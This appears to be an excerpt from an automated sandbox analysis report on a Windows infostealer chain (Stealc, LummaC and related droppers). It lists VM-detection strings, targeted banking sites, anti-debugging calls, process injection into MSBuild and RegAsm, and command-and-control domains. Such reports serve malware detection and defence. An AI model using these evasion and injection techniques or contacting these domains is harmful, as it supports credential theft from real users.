Source: axplong.exe, 00000007.00000002.4561179734.000000000105B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW8@
Source: file.exe, 00000000.00000002.2175873508.0000000000762000.00000040.00000001.01000000.00000003.sdmp, axplong.exe, 00000002.00000002.2198654465.0000000000452000.00000040.00000001.01000000.00000007.sdmp, axplong.exe, 00000003.00000002.2198746203.0000000000452000.00000040.00000001.01000000.00000007.sdmp, axplong.exe, 00000007.00000002.4556562493.0000000000452000.00000040.00000001.01000000.00000007.sdmp, d0d468f327.exe, 00000024.00000002.3867006295.000000000042C000.00000040.00000001.01000000.00000020.sdmp, OFF011F112LUQGJPCDB24W.exe, 00000025.00000002.3120833121.00000000010B8000.00000040.00000001.01000000.00000021.sdmp, 4ad48d7d65.exe, 0000002B.00000002.3146758221.0000000000826000.00000040.00000001.01000000.00000023.sdmp	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: InstallUtil.exe, 00000014.00000002.3012882720.000000000077C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWhJ\|%SystemRoot%\system32\mswsock.dll^
Source: MSBuild.exe, 00000017.00000002.3124675107.0000000003B76000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: d0d468f327.exe, 00000024.00000003.3189850986.0000000005C3F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: MSBuild.exe, 00000017.00000002.3124675107.0000000003B76000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: Amcache.hve.13.dr	Binary or memory string: VMware
Source: d0d468f327.exe, 00000024.00000003.3189850986.0000000005C3F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: d0d468f327.exe, 00000024.00000003.3189850986.0000000005C3F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: d0d468f327.exe, 00000024.00000003.3189850986.0000000005C3F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696428655
Source: d0d468f327.exe, 00000024.00000003.3187304170.0000000005B69000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: - GDCDYNVMware20,11696428655p
Source: Amcache.hve.13.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: axplong.exe, 00000007.00000002.4561179734.000000000108D000.00000004.00000020.00020000.00000000.sdmp, stealc_default2.exe, 0000000E.00000002.2886105690.000000000084E000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000014.00000002.3013913479.00000000007BE000.00000004.00000020.00020000.00000000.sdmp, d0d468f327.exe, 00000024.00000003.3860117485.0000000001314000.00000004.00000020.00020000.00000000.sdmp, d0d468f327.exe, 00000024.00000003.3859535207.0000000001314000.00000004.00000020.00020000.00000000.sdmp, d0d468f327.exe, 00000024.00000002.3868990763.0000000001314000.00000004.00000020.00020000.00000000.sdmp, 4ad48d7d65.exe, 0000002B.00000002.3186818225.000000000123F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: d0d468f327.exe, 00000024.00000003.3189850986.0000000005C3F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: Amcache.hve.13.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: d0d468f327.exe, 00000024.00000003.3189850986.0000000005C3F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: MSBuild.exe, 00000017.00000002.3124675107.0000000003B76000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696428655\|UE
Source: d0d468f327.exe, 00000024.00000003.3189850986.0000000005C3F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: d0d468f327.exe, 00000024.00000003.3189850986.0000000005C3F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: 4ad48d7d65.exe, 0000002B.00000002.3186818225.00000000011CE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware^
Source: d0d468f327.exe, 00000024.00000003.3187304170.0000000005B69000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: YNVMware
Source: file.exe, 00000000.00000003.2136722669.000000000115F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}&<
Source: Amcache.hve.13.dr	Binary or memory string: VMware20,1
Source: gold.exe, 00000013.00000002.2774776253.0000000003571000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SerialNumber0VMware\|VIRTUAL\|A M I\|XenDselect * from Win32_ComputerSystem
Source: Amcache.hve.13.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.13.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.13.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: 4ad48d7d65.exe, 0000002B.00000002.3186818225.00000000011CE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware
Source: d0d468f327.exe, 00000024.00000003.3189850986.0000000005C3F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: Amcache.hve.13.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.13.dr	Binary or memory string: VMware VMCI Bus Device
Source: MSBuild.exe, 00000017.00000002.3124675107.0000000003B76000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: MSBuild.exe, 00000017.00000002.3124675107.0000000003B76000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: MSBuild.exe, 00000017.00000002.3124675107.0000000003B76000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: d0d468f327.exe, 00000024.00000003.3189850986.0000000005C3F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
Source: Amcache.hve.13.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563
Source: d0d468f327.exe, 00000024.00000003.3189850986.0000000005C3F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: MSBuild.exe, 00000017.00000002.3124675107.0000000003B76000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: 4ad48d7d65.exe, 0000002B.00000002.3186818225.000000000123F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW;
Source: Amcache.hve.13.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.13.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.13.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.13.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: axplong.exe, 00000007.00000002.4561179734.000000000108D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW2
Source: d0d468f327.exe, 00000024.00000003.3189850986.0000000005C3F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: MSBuild.exe, 00000017.00000002.3124675107.0000000003B76000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: MSBuild.exe, 00000017.00000002.3124675107.0000000003B76000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: Amcache.hve.13.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: MSBuild.exe, 00000017.00000002.3124675107.0000000003B76000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: d0d468f327.exe, 00000024.00000003.3189850986.0000000005C3F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: d0d468f327.exe, 00000024.00000003.3189850986.0000000005C3F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: d0d468f327.exe, 00000024.00000003.3189850986.0000000005C3F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: Amcache.hve.13.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: d0d468f327.exe, 00000024.00000003.3189850986.0000000005C3F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: Jurisdiction.pif, 00000029.00000002.4580472660.0000000001200000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: MSBuild.exe, 00000017.00000002.3124675107.0000000003B76000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: 4ad48d7d65.exe, 0000002B.00000002.3186818225.0000000001216000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW(C$
Source: MSBuild.exe, 00000017.00000002.3124675107.0000000003B76000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696428655s
Source: MSBuild.exe, 00000017.00000002.3124675107.0000000003B76000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696428655o
Source: OFF011F112LUQGJPCDB24W.exe, 00000025.00000000.3006027881.00000000010B8000.00000080.00000001.01000000.00000021.sdmp	Binary or memory string: F\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: Amcache.hve.13.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.13.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: MSBuild.exe, 00000017.00000002.3124675107.0000000003B76000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: d0d468f327.exe, 00000024.00000002.3868454285.00000000012BE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWH
Source: MSBuild.exe, 00000017.00000002.3124675107.0000000003B76000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: MSBuild.exe, 00000017.00000002.3124675107.0000000003B76000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: MSBuild.exe, 00000017.00000002.3124675107.0000000003B76000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696428655x

Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	API call chain: ExitProcess graph end node	graph_14-57085
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	API call chain: ExitProcess graph end node	graph_14-57100
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	API call chain: ExitProcess graph end node	graph_14-58263
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	API call chain: ExitProcess graph end node	graph_14-57088
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	API call chain: ExitProcess graph end node	graph_14-57108
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	API call chain: ExitProcess graph end node	graph_14-57104
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	API call chain: ExitProcess graph end node	graph_14-57129
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	API call chain: ExitProcess graph end node	graph_14-56918

Source: C:\Users\user\Desktop\file.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\Desktop\file.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000474001\gold.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\OFF011F112LUQGJPCDB24W.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1000876001\4ad48d7d65.exe	Thread information set: HideFromDebugger

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\AppData\Local\Temp\1000876001\4ad48d7d65.exe	Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\1000876001\4ad48d7d65.exe	Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\1000876001\4ad48d7d65.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\1000876001\4ad48d7d65.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\1000876001\4ad48d7d65.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\1000876001\4ad48d7d65.exe	Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\1000876001\4ad48d7d65.exe	Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\1000876001\4ad48d7d65.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Source: C:\Users\user\AppData\Local\Temp\1000876001\4ad48d7d65.exe	File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\1000876001\4ad48d7d65.exe	File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\1000876001\4ad48d7d65.exe	File opened: SIWVID

Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000004001\zxcv.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000004001\zxcv.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000474001\gold.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1000474001\gold.exe	Process queried: DebugObjectHandle
Source: C:\Users\user\AppData\Local\Temp\1000474001\gold.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1000569001\myrdx.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1000569001\myrdx.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\OFF011F112LUQGJPCDB24W.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\OFF011F112LUQGJPCDB24W.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\OFF011F112LUQGJPCDB24W.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1000876001\4ad48d7d65.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1000876001\4ad48d7d65.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1000876001\4ad48d7d65.exe	Process queried: DebugPort

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_05130375 rdtsc

0_2_05130375

Source: C:\Users\user\AppData\Local\Temp\1000004001\zxcv.exe

Code function: 8_2_00244EFA LdrInitializeThunk,LdrInitializeThunk,

8_2_00244EFA

Source: C:\Users\user\AppData\Local\Temp\1000004001\zxcv.exe

Code function: 8_2_0024B143 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

8_2_0024B143

Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe

Code function: 14_2_00CA45C0 VirtualProtect ?,00000004,00000100,00000000

14_2_00CA45C0

Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe

14_2_00CB9860

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 7_2_0029645B mov eax, dword ptr fs:[00000030h]	7_2_0029645B
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 7_2_0029A1C2 mov eax, dword ptr fs:[00000030h]	7_2_0029A1C2
Source: C:\Users\user\AppData\Local\Temp\1000004001\zxcv.exe	Code function: 8_2_002457B4 mov edi, dword ptr fs:[00000030h]	8_2_002457B4
Source: C:\Users\user\AppData\Local\Temp\1000004001\zxcv.exe	Code function: 8_2_00251523 mov ecx, dword ptr fs:[00000030h]	8_2_00251523
Source: C:\Users\user\AppData\Local\Temp\1000004001\zxcv.exe	Code function: 8_2_00287564 mov eax, dword ptr fs:[00000030h]	8_2_00287564
Source: C:\Users\user\AppData\Local\Temp\1000004001\zxcv.exe	Code function: 8_2_0027F8BE mov ecx, dword ptr fs:[00000030h]	8_2_0027F8BE
Source: C:\Users\user\AppData\Local\Temp\1000004001\zxcv.exe	Code function: 8_2_0025BBC4 mov eax, dword ptr fs:[00000030h]	8_2_0025BBC4
Source: C:\Users\user\AppData\Local\Temp\1000004001\zxcv.exe	Code function: 9_2_0025BBC4 mov eax, dword ptr fs:[00000030h]	9_2_0025BBC4
Source: C:\Users\user\AppData\Local\Temp\1000004001\zxcv.exe	Code function: 9_2_00251523 mov ecx, dword ptr fs:[00000030h]	9_2_00251523
Source: C:\Users\user\AppData\Local\Temp\1000004001\zxcv.exe	Code function: 9_2_002457B4 mov edi, dword ptr fs:[00000030h]	9_2_002457B4
Source: C:\Users\user\AppData\Local\Temp\1000004001\zxcv.exe	Code function: 10_2_0041914C mov eax, dword ptr fs:[00000030h]	10_2_0041914C
Source: C:\Users\user\AppData\Local\Temp\1000004001\zxcv.exe	Code function: 10_2_004114A6 mov ecx, dword ptr fs:[00000030h]	10_2_004114A6
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 14_2_00CB9750 mov eax, dword ptr fs:[00000030h]	14_2_00CB9750

Source: C:\Users\user\AppData\Local\Temp\1000004001\zxcv.exe

Code function: 8_2_002457B4 DeleteFileA,VirtualProtect,GetProcessHeap,GetProcessHeap,HeapAlloc,wsprintfA,GetStdHandle,WriteConsoleA,GetProcessHeap,HeapFree,

8_2_002457B4

Source: C:\Users\user\AppData\Local\Temp\1000474001\gold.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\1000474001\gold.exe	Process token adjusted: Debug
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\1000833001\13a34faa3c.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\tasklist.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\tasklist.exe	Process token adjusted: Debug

Source: C:\Users\user\AppData\Local\Temp\1000004001\zxcv.exe	Code function: 8_2_002470C5 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	8_2_002470C5
Source: C:\Users\user\AppData\Local\Temp\1000004001\zxcv.exe	Code function: 8_2_0024B143 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	8_2_0024B143
Source: C:\Users\user\AppData\Local\Temp\1000004001\zxcv.exe	Code function: 8_2_002473CB IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	8_2_002473CB
Source: C:\Users\user\AppData\Local\Temp\1000004001\zxcv.exe	Code function: 8_2_00247558 SetUnhandledExceptionFilter,	8_2_00247558
Source: C:\Users\user\AppData\Local\Temp\1000004001\zxcv.exe	Code function: 9_2_002470C5 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	9_2_002470C5
Source: C:\Users\user\AppData\Local\Temp\1000004001\zxcv.exe	Code function: 9_2_0024B143 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	9_2_0024B143
Source: C:\Users\user\AppData\Local\Temp\1000004001\zxcv.exe	Code function: 9_2_002473CB IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	9_2_002473CB
Source: C:\Users\user\AppData\Local\Temp\1000004001\zxcv.exe	Code function: 9_2_00247558 SetUnhandledExceptionFilter,	9_2_00247558
Source: C:\Users\user\AppData\Local\Temp\1000004001\zxcv.exe	Code function: 10_2_00407B01 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	10_2_00407B01
Source: C:\Users\user\AppData\Local\Temp\1000004001\zxcv.exe	Code function: 10_2_00407C63 SetUnhandledExceptionFilter,	10_2_00407C63
Source: C:\Users\user\AppData\Local\Temp\1000004001\zxcv.exe	Code function: 10_2_00407D75 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	10_2_00407D75
Source: C:\Users\user\AppData\Local\Temp\1000004001\zxcv.exe	Code function: 10_2_0040DD78 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	10_2_0040DD78
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 14_2_00CBAD48 memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	14_2_00CBAD48
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 14_2_00CBCEEA SetUnhandledExceptionFilter,	14_2_00CBCEEA
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 14_2_00CBB33A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	14_2_00CBB33A
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 14_2_6BADB1F7 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	14_2_6BADB1F7
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 14_2_6BADB66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	14_2_6BADB66C

Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe

Memory protected: page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match	File source: Process Memory Space: stealc_default2.exe PID: 5864, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 4ad48d7d65.exe PID: 1600, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\stealc_default2[1].exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe, type: DROPPED

Allocates memory in foreign processes

Source: C:\Users\user\AppData\Local\Temp\1000569001\myrdx.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 protect: page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\1000833001\13a34faa3c.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write

Injects a PE file into a foreign processes

Source: C:\Users\user\AppData\Local\Temp\1000004001\zxcv.exe	Memory written: C:\Users\user\AppData\Local\Temp\1000004001\zxcv.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000569001\myrdx.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\Temp\1000833001\13a34faa3c.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A

LummaC encrypted strings found

Source: gold.exe, 00000013.00000002.2774776253.0000000003571000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: scriptyprefej.store
Source: gold.exe, 00000013.00000002.2774776253.0000000003571000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: navygenerayk.store
Source: gold.exe, 00000013.00000002.2774776253.0000000003571000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: founpiuer.store
Source: gold.exe, 00000013.00000002.2774776253.0000000003571000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: necklacedmny.store
Source: gold.exe, 00000013.00000002.2774776253.0000000003571000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: thumbystriw.store
Source: gold.exe, 00000013.00000002.2774776253.0000000003571000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: fadehairucw.store
Source: gold.exe, 00000013.00000002.2774776253.0000000003571000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: crisiwarny.store
Source: gold.exe, 00000013.00000002.2774776253.0000000003571000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: presticitpo.store
Source: d0d468f327.exe, 00000024.00000002.3866570088.0000000000241000.00000040.00000001.01000000.00000020.sdmp	String found in binary or memory: opinieni.store

Searches for specific processes (likely to inject)

Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe

Code function: 14_2_00CB9600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,

14_2_00CB9600

Writes to foreign memory regions

Source: C:\Users\user\AppData\Local\Temp\1000569001\myrdx.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000
Source: C:\Users\user\AppData\Local\Temp\1000569001\myrdx.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 402000
Source: C:\Users\user\AppData\Local\Temp\1000569001\myrdx.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 432000
Source: C:\Users\user\AppData\Local\Temp\1000569001\myrdx.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 450000
Source: C:\Users\user\AppData\Local\Temp\1000569001\myrdx.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 8F2008
Source: C:\Users\user\AppData\Local\Temp\1000833001\13a34faa3c.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
